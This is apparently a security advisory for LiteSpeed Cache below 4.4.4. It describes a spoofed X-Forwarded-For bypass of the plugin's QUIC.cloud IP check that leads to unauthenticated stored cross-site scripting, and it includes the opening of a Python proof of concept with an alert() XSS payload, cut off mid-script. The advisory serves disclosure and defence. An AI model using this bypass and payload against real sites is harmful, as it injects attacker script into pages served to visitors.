LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoint could be used to set CSS code if a setting is enabled, which will then be output in some pages without being sanitised and escaped. Combining those two issues, an unauthenticated attacker could put Cross-Site Scripting payloads in pages visited by users.

PoC

The “Load CSS Asynchronously” setting in the Page Optimization (/wp-admin/admin.php?page=litespeed-page_optm) needs to be turned on for this to work #!/bin/python3 import requests import json def get_whitelist_ips(): return requests.get(“https://quic.cloud/ips”, verify=False).text print(“[+] Getting the whitelisted ips…”) whitelist_ip = get_whitelist_ips().split("
“)[0] print(f”[+] Using {whitelist_ip}") payload = "alert(/XSS-cache/);